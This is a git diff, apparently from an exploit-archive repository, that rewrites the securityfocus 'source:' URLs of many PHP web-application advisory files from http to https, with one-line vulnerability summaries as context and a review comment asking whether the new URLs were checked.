--- a/exploits/php/webapps/26871.txt +++ b/exploits/php/webapps/26871.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15928/info +source: https://www.securityfocus.com/bid/15928/info PlaySmS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26872.txt b/exploits/php/webapps/26872.txt index 5e4ee0aa5..64b4c1366 100644 --- a/exploits/php/webapps/26872.txt +++ b/exploits/php/webapps/26872.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15931/info +source: https://www.securityfocus.com/bid/15931/info PHP-Fusion is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26877.txt b/exploits/php/webapps/26877.txt index 1caf86921..08f20ecbe 100644 --- a/exploits/php/webapps/26877.txt +++ b/exploits/php/webapps/26877.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15936/info +source: https://www.securityfocus.com/bid/15936/info Box UK Amaxus CMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26878.txt b/exploits/php/webapps/26878.txt index 359485845..a28f0d0cf 100644 --- a/exploits/php/webapps/26878.txt +++ b/exploits/php/webapps/26878.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15939/info +source: https://www.securityfocus.com/bid/15939/info Caravel CMS is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26879.txt b/exploits/php/webapps/26879.txt index a4016c220..7058001e6 100644 --- a/exploits/php/webapps/26879.txt +++ b/exploits/php/webapps/26879.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15940/info +source: https://www.securityfocus.com/bid/15940/info Cofax is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26880.txt b/exploits/php/webapps/26880.txt index 270d84a75..1982223d5 100644 --- a/exploits/php/webapps/26880.txt +++ b/exploits/php/webapps/26880.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15947/info +source: https://www.securityfocus.com/bid/15947/info FLIP is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26881.txt b/exploits/php/webapps/26881.txt index 57fff5c9d..bbd4eea0d 100644 --- a/exploits/php/webapps/26881.txt +++ b/exploits/php/webapps/26881.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15947/info +source: https://www.securityfocus.com/bid/15947/info FLIP is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26883.txt b/exploits/php/webapps/26883.txt index 0e32000cf..3ede0f2b6 100644 --- a/exploits/php/webapps/26883.txt +++ b/exploits/php/webapps/26883.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15950/info +source: https://www.securityfocus.com/bid/15950/info Enterprise CMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26884.txt b/exploits/php/webapps/26884.txt index 18fda6ebc..a1e891582 100644 --- a/exploits/php/webapps/26884.txt +++ b/exploits/php/webapps/26884.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15951/info +source: https://www.securityfocus.com/bid/15951/info Liferay Portal Enterprise is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26885.txt b/exploits/php/webapps/26885.txt index e317be2c2..5d2461c8d 100644 --- a/exploits/php/webapps/26885.txt +++ b/exploits/php/webapps/26885.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15952/info +source: https://www.securityfocus.com/bid/15952/info Lighthouse is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26895.txt b/exploits/php/webapps/26895.txt index 0bcb42d81..4f144a3b8 100644 --- a/exploits/php/webapps/26895.txt +++ b/exploits/php/webapps/26895.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15954/info +source: https://www.securityfocus.com/bid/15954/info Magnolia Content Management Suite is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26896.txt b/exploits/php/webapps/26896.txt index 9402ce38e..a932a29d2 100644 --- a/exploits/php/webapps/26896.txt +++ b/exploits/php/webapps/26896.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15956/info +source: https://www.securityfocus.com/bid/15956/info ContentServ is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26897.txt b/exploits/php/webapps/26897.txt index 1147e91cb..1143cb1f5 100644 --- a/exploits/php/webapps/26897.txt +++ b/exploits/php/webapps/26897.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15957/info +source: https://www.securityfocus.com/bid/15957/info Direct News is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26898.txt b/exploits/php/webapps/26898.txt index d7710203f..a3d5daeb4 100644 --- a/exploits/php/webapps/26898.txt +++ b/exploits/php/webapps/26898.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15958/info +source: https://www.securityfocus.com/bid/15958/info ODFaq is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26899.txt b/exploits/php/webapps/26899.txt index d83621d05..637b715e7 100644 --- a/exploits/php/webapps/26899.txt +++ b/exploits/php/webapps/26899.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15959/info +source: https://www.securityfocus.com/bid/15959/info Marwel is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26900.txt b/exploits/php/webapps/26900.txt index 13e77b18a..18d9a2769 100644 --- a/exploits/php/webapps/26900.txt +++ b/exploits/php/webapps/26900.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15960/info +source: https://www.securityfocus.com/bid/15960/info Miraserver is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26901.txt b/exploits/php/webapps/26901.txt index 5239bde76..70ea0e6b2 100644 --- a/exploits/php/webapps/26901.txt +++ b/exploits/php/webapps/26901.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15960/info +source: https://www.securityfocus.com/bid/15960/info Miraserver is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26902.txt b/exploits/php/webapps/26902.txt index e67fc5fe8..b3a024ae7 100644 --- a/exploits/php/webapps/26902.txt +++ b/exploits/php/webapps/26902.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15960/info +source: https://www.securityfocus.com/bid/15960/info Miraserver is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26904.txt b/exploits/php/webapps/26904.txt index c82783f06..a403877a0 100644 --- a/exploits/php/webapps/26904.txt +++ b/exploits/php/webapps/26904.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15962/info +source: https://www.securityfocus.com/bid/15962/info bitweaver is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26905.txt b/exploits/php/webapps/26905.txt index 884cf18e1..fd5642076 100644 --- a/exploits/php/webapps/26905.txt +++ b/exploits/php/webapps/26905.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15962/info +source: https://www.securityfocus.com/bid/15962/info bitweaver is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26906.txt b/exploits/php/webapps/26906.txt index 65fa81493..be4299079 100644 --- a/exploits/php/webapps/26906.txt +++ b/exploits/php/webapps/26906.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15962/info +source: https://www.securityfocus.com/bid/15962/info bitweaver is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26907.txt b/exploits/php/webapps/26907.txt index b246ec2c2..bba909b36 100644 --- a/exploits/php/webapps/26907.txt +++ b/exploits/php/webapps/26907.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15962/info +source: https://www.securityfocus.com/bid/15962/info bitweaver is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26908.txt b/exploits/php/webapps/26908.txt index bc17c5caf..8d6865347 100644 --- a/exploits/php/webapps/26908.txt +++ b/exploits/php/webapps/26908.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15962/info +source: https://www.securityfocus.com/bid/15962/info bitweaver is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26911.txt b/exploits/php/webapps/26911.txt index 31b1aaaad..d3e1a1247 100644 --- a/exploits/php/webapps/26911.txt +++ b/exploits/php/webapps/26911.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15966/info +source: https://www.securityfocus.com/bid/15966/info Komodo CMS is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26912.txt b/exploits/php/webapps/26912.txt index 2c50cfe67..78b9078ab 100644 --- a/exploits/php/webapps/26912.txt +++ b/exploits/php/webapps/26912.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15967/info +source: https://www.securityfocus.com/bid/15967/info Mercury CMS is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26916.txt b/exploits/php/webapps/26916.txt index 9e10714a6..4510983c3 100644 --- a/exploits/php/webapps/26916.txt +++ b/exploits/php/webapps/26916.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15984/info +source: https://www.securityfocus.com/bid/15984/info Enterprise Connector is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26918.txt b/exploits/php/webapps/26918.txt index b2e779ac5..dd74e9dfc 100644 --- a/exploits/php/webapps/26918.txt +++ b/exploits/php/webapps/26918.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15992/info +source: https://www.securityfocus.com/bid/15992/info Plogger is prone to a remote file include vulnerability. diff --git a/exploits/php/webapps/26919.txt b/exploits/php/webapps/26919.txt index 021bc9c53..254d0784a 100644 --- a/exploits/php/webapps/26919.txt +++ b/exploits/php/webapps/26919.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15993/info +source: https://www.securityfocus.com/bid/15993/info D-Man is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'title' parameter. diff --git a/exploits/php/webapps/26921.txt b/exploits/php/webapps/26921.txt index 70cf7db9e..a0942509a 100644 --- a/exploits/php/webapps/26921.txt +++ b/exploits/php/webapps/26921.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16000/info +source: https://www.securityfocus.com/bid/16000/info Tolva is prone to a remote file-include vulnerability. 
diff --git a/exploits/php/webapps/26923.txt b/exploits/php/webapps/26923.txt index d24983a07..95dea45b2 100644 --- a/exploits/php/webapps/26923.txt +++ b/exploits/php/webapps/26923.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16002/info +source: https://www.securityfocus.com/bid/16002/info Beehive Forum is prone to multiple HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/26925.txt b/exploits/php/webapps/26925.txt index e26bc7158..2fa0204ef 100644 --- a/exploits/php/webapps/26925.txt +++ b/exploits/php/webapps/26925.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16005/info +source: https://www.securityfocus.com/bid/16005/info papaya CMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26938.txt b/exploits/php/webapps/26938.txt index 50fa6383c..2286bad18 100644 --- a/exploits/php/webapps/26938.txt +++ b/exploits/php/webapps/26938.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16014/info +source: https://www.securityfocus.com/bid/16014/info Scoop is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26939.txt b/exploits/php/webapps/26939.txt index fbd9f4255..8fa3d3a16 100644 --- a/exploits/php/webapps/26939.txt +++ b/exploits/php/webapps/26939.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16014/info +source: https://www.securityfocus.com/bid/16014/info Scoop is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/26959.txt b/exploits/php/webapps/26959.txt index fc4cbb5e7..e5e7fe77c 100644 --- a/exploits/php/webapps/26959.txt +++ b/exploits/php/webapps/26959.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16020/info +source: https://www.securityfocus.com/bid/16020/info Papoo is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26960.txt b/exploits/php/webapps/26960.txt index 53c9982c6..2ba971ea5 100644 --- a/exploits/php/webapps/26960.txt +++ b/exploits/php/webapps/26960.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16020/info +source: https://www.securityfocus.com/bid/16020/info Papoo is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26961.txt b/exploits/php/webapps/26961.txt index 0429e57e4..3d5b5c9de 100644 --- a/exploits/php/webapps/26961.txt +++ b/exploits/php/webapps/26961.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16020/info +source: https://www.securityfocus.com/bid/16020/info Papoo is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26962.txt b/exploits/php/webapps/26962.txt index 79a11ce3e..2976d9ba9 100644 --- a/exploits/php/webapps/26962.txt +++ b/exploits/php/webapps/26962.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16021/info +source: https://www.securityfocus.com/bid/16021/info phpSlash is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. 
diff --git a/exploits/php/webapps/26965.txt b/exploits/php/webapps/26965.txt index ff05e2981..9056f96fc 100644 --- a/exploits/php/webapps/26965.txt +++ b/exploits/php/webapps/26965.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16030/info +source: https://www.securityfocus.com/bid/16030/info MusicBox is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/26968.txt b/exploits/php/webapps/26968.txt index cc3b01e60..830c1665c 100644 --- a/exploits/php/webapps/26968.txt +++ b/exploits/php/webapps/26968.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16033/info +source: https://www.securityfocus.com/bid/16033/info SyntaxCMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26973.txt b/exploits/php/webapps/26973.txt index e464e9751..dc509cc89 100644 --- a/exploits/php/webapps/26973.txt +++ b/exploits/php/webapps/26973.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16062/info +source: https://www.securityfocus.com/bid/16062/info Cerberus Helpdesk is prone to multiple cross-site scripting and SQL injection vulnerabilities. These issues are the result of inadequate validation of user-supplied input that will be included in site output or in SQL queries. diff --git a/exploits/php/webapps/26974.txt b/exploits/php/webapps/26974.txt index 23f7fdc63..832dfcf65 100644 --- a/exploits/php/webapps/26974.txt +++ b/exploits/php/webapps/26974.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16062/info +source: https://www.securityfocus.com/bid/16062/info Cerberus Helpdesk is prone to multiple cross-site scripting and SQL injection vulnerabilities. These issues are the result of inadequate validation of user-supplied input that will be included in site output or in SQL queries. 
diff --git a/exploits/php/webapps/26975.txt b/exploits/php/webapps/26975.txt index 7e9c77b96..4a282ae90 100644 --- a/exploits/php/webapps/26975.txt +++ b/exploits/php/webapps/26975.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16062/info +source: https://www.securityfocus.com/bid/16062/info Cerberus Helpdesk is prone to multiple cross-site scripting and SQL injection vulnerabilities. These issues are the result of inadequate validation of user-supplied input that will be included in site output or in SQL queries. diff --git a/exploits/php/webapps/26976.txt b/exploits/php/webapps/26976.txt index 70ab3ef51..2b1cd7116 100644 --- a/exploits/php/webapps/26976.txt +++ b/exploits/php/webapps/26976.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16063/info +source: https://www.securityfocus.com/bid/16063/info Dev Web Management System is prone to multiple input validation vulnerabilities. These issues may allow SQL injection and cross-site scripting attacks. diff --git a/exploits/php/webapps/26977.txt b/exploits/php/webapps/26977.txt index 90deb5540..f1631f7b5 100644 --- a/exploits/php/webapps/26977.txt +++ b/exploits/php/webapps/26977.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16063/info +source: https://www.securityfocus.com/bid/16063/info Dev Web Management System is prone to multiple input validation vulnerabilities. These issues may allow SQL injection and cross-site scripting attacks. diff --git a/exploits/php/webapps/26978.txt b/exploits/php/webapps/26978.txt index b94787f0c..29869d46b 100644 --- a/exploits/php/webapps/26978.txt +++ b/exploits/php/webapps/26978.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16063/info +source: https://www.securityfocus.com/bid/16063/info Dev Web Management System is prone to multiple input validation vulnerabilities. These issues may allow SQL injection and cross-site scripting attacks. 
diff --git a/exploits/php/webapps/26979.txt b/exploits/php/webapps/26979.txt index ea02594e0..a78b07937 100644 --- a/exploits/php/webapps/26979.txt +++ b/exploits/php/webapps/26979.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16069/info +source: https://www.securityfocus.com/bid/16069/info IceWarp Universal WebMail is prone to multiple input-validation vulnerabilities. Deerfield VisNetic Mail Server and Merak Mail Server integrate IceWarp Universal WebMail into their suites. diff --git a/exploits/php/webapps/26980.txt b/exploits/php/webapps/26980.txt index ba16722cc..81b6ec817 100644 --- a/exploits/php/webapps/26980.txt +++ b/exploits/php/webapps/26980.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16069/info +source: https://www.securityfocus.com/bid/16069/info IceWarp Universal WebMail is prone to multiple input-validation vulnerabilities. Deerfield VisNetic Mail Server and Merak Mail Server integrate IceWarp Universal WebMail into their suites. diff --git a/exploits/php/webapps/26981.txt b/exploits/php/webapps/26981.txt index 2f2f06d67..dcb16a3ff 100644 --- a/exploits/php/webapps/26981.txt +++ b/exploits/php/webapps/26981.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16069/info +source: https://www.securityfocus.com/bid/16069/info IceWarp Universal WebMail is prone to multiple input-validation vulnerabilities. Deerfield VisNetic Mail Server and Merak Mail Server integrate IceWarp Universal WebMail into their suites. diff --git a/exploits/php/webapps/26982.txt b/exploits/php/webapps/26982.txt index 7d3f5041d..7539c5c32 100644 --- a/exploits/php/webapps/26982.txt +++ b/exploits/php/webapps/26982.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16069/info +source: https://www.securityfocus.com/bid/16069/info IceWarp Universal WebMail is prone to multiple input-validation vulnerabilities. Deerfield VisNetic Mail Server and Merak Mail Server integrate IceWarp Universal WebMail into their suites. 
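Review bot: the `source:` line is each file's provenance record, and nothing in these hunks shows that the https form of the URL was checked to serve the same BID page as the recorded http one. In the hunks above, `bid/16069/info` is rewritten identically in 26979.txt, 26980.txt, 26981.txt and 26982.txt, so one check per unique BID is enough rather than one per file. Please state in the commit message that the rewritten URLs were verified, or that the change is a scheme-only normalisation made without checking them.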
diff --git a/exploits/php/webapps/26983.txt b/exploits/php/webapps/26983.txt index 14baa3553..6289bd991 100644 --- a/exploits/php/webapps/26983.txt +++ b/exploits/php/webapps/26983.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16069/info +source: https://www.securityfocus.com/bid/16069/info IceWarp Universal WebMail is prone to multiple input-validation vulnerabilities. Deerfield VisNetic Mail Server and Merak Mail Server integrate IceWarp Universal WebMail into their suites. diff --git a/exploits/php/webapps/26984.txt b/exploits/php/webapps/26984.txt index 2809f6276..26be6184a 100644 --- a/exploits/php/webapps/26984.txt +++ b/exploits/php/webapps/26984.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16069/info +source: https://www.securityfocus.com/bid/16069/info IceWarp Universal WebMail is prone to multiple input-validation vulnerabilities. Deerfield VisNetic Mail Server and Merak Mail Server integrate IceWarp Universal WebMail into their suites. diff --git a/exploits/php/webapps/26988.txt b/exploits/php/webapps/26988.txt index 0fc0a45cd..6568c75af 100644 --- a/exploits/php/webapps/26988.txt +++ b/exploits/php/webapps/26988.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16078/info +source: https://www.securityfocus.com/bid/16078/info Koobi is prone to a script injection vulnerability. diff --git a/exploits/php/webapps/26989.txt b/exploits/php/webapps/26989.txt index 03c19a0a2..8c9fb2a5a 100644 --- a/exploits/php/webapps/26989.txt +++ b/exploits/php/webapps/26989.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16081/info +source: https://www.securityfocus.com/bid/16081/info GMailSite is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/26990.txt b/exploits/php/webapps/26990.txt index 01f574ba8..be7910b94 100644 --- a/exploits/php/webapps/26990.txt +++ b/exploits/php/webapps/26990.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16082/info +source: https://www.securityfocus.com/bid/16082/info MyBB is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/26992.txt b/exploits/php/webapps/26992.txt index b0f30a3c3..bdccd58f8 100644 --- a/exploits/php/webapps/26992.txt +++ b/exploits/php/webapps/26992.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16090/info +source: https://www.securityfocus.com/bid/16090/info Ades Design AdesGuestbook is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26993.txt b/exploits/php/webapps/26993.txt index 46fa0c59f..111b10511 100644 --- a/exploits/php/webapps/26993.txt +++ b/exploits/php/webapps/26993.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16091/info +source: https://www.securityfocus.com/bid/16091/info OOApp Guestbook is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26994.txt b/exploits/php/webapps/26994.txt index ea9b6149f..c92df349c 100644 --- a/exploits/php/webapps/26994.txt +++ b/exploits/php/webapps/26994.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16094/info +source: https://www.securityfocus.com/bid/16094/info Kayako SupportSuite is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/26995.txt b/exploits/php/webapps/26995.txt index b2af674e4..b51f4168e 100644 --- a/exploits/php/webapps/26995.txt +++ b/exploits/php/webapps/26995.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16101/info +source: https://www.securityfocus.com/bid/16101/info phpDocumentor is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/26998.txt b/exploits/php/webapps/26998.txt index 0f09f73b3..d6b1d5755 100644 --- a/exploits/php/webapps/26998.txt +++ b/exploits/php/webapps/26998.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16105/info +source: https://www.securityfocus.com/bid/16105/info The oaBoard application is prone to a remote file-include vulnerability. As a result, remote users may specify external PHP scripts to be included by the application. diff --git a/exploits/php/webapps/26999.txt b/exploits/php/webapps/26999.txt index dd0154926..580ea9ee5 100644 --- a/exploits/php/webapps/26999.txt +++ b/exploits/php/webapps/26999.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16106/info +source: https://www.securityfocus.com/bid/16106/info phpBook is prone to a vulnerability that may let remote attackers inject arbitrary PHP code into the application. This code may then be executed by visiting pages that include the injected code. diff --git a/exploits/php/webapps/27000.txt b/exploits/php/webapps/27000.txt index 2a3528838..6f831bbac 100644 --- a/exploits/php/webapps/27000.txt +++ b/exploits/php/webapps/27000.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16107/info +source: https://www.securityfocus.com/bid/16107/info VEGO Web Forum is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27001.txt b/exploits/php/webapps/27001.txt index 1c8b6aff8..eb998ff99 100644 --- a/exploits/php/webapps/27001.txt +++ b/exploits/php/webapps/27001.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16108/info +source: https://www.securityfocus.com/bid/16108/info VEGO Links Builder is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. 
diff --git a/exploits/php/webapps/27002.txt b/exploits/php/webapps/27002.txt index 7a4b97546..6314aabb0 100644 --- a/exploits/php/webapps/27002.txt +++ b/exploits/php/webapps/27002.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16109/info +source: https://www.securityfocus.com/bid/16109/info Jevontech PHPenpals is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27003.txt b/exploits/php/webapps/27003.txt index 1f08dd95d..91a4de93b 100644 --- a/exploits/php/webapps/27003.txt +++ b/exploits/php/webapps/27003.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16110/info +source: https://www.securityfocus.com/bid/16110/info inTouch is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27004.txt b/exploits/php/webapps/27004.txt index b7d1b1989..17fce1df7 100644 --- a/exploits/php/webapps/27004.txt +++ b/exploits/php/webapps/27004.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16111/info +source: https://www.securityfocus.com/bid/16111/info PHPjournaler is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27015.txt b/exploits/php/webapps/27015.txt index 99132a02c..3ecd29f52 100644 --- a/exploits/php/webapps/27015.txt +++ b/exploits/php/webapps/27015.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16112/info +source: https://www.securityfocus.com/bid/16112/info Chipmunk Guestbook is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. 
diff --git a/exploits/php/webapps/27016.txt b/exploits/php/webapps/27016.txt index 678ac1aae..9ff97efbb 100644 --- a/exploits/php/webapps/27016.txt +++ b/exploits/php/webapps/27016.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16113/info +source: https://www.securityfocus.com/bid/16113/info Chimera Web Portal is prone to multiple input validation vulnerabilities. The issues include cross-site scripting and SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27017.txt b/exploits/php/webapps/27017.txt index 27998eb67..81a2c77cc 100644 --- a/exploits/php/webapps/27017.txt +++ b/exploits/php/webapps/27017.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16113/info +source: https://www.securityfocus.com/bid/16113/info Chimera Web Portal is prone to multiple input validation vulnerabilities. The issues include cross-site scripting and SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27018.txt b/exploits/php/webapps/27018.txt index c3e4165e8..8dd646f50 100644 --- a/exploits/php/webapps/27018.txt +++ b/exploits/php/webapps/27018.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16115/info +source: https://www.securityfocus.com/bid/16115/info ScozNet ScozBook is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27019.txt b/exploits/php/webapps/27019.txt index 96205ad6a..d81726913 100644 --- a/exploits/php/webapps/27019.txt +++ b/exploits/php/webapps/27019.txt 
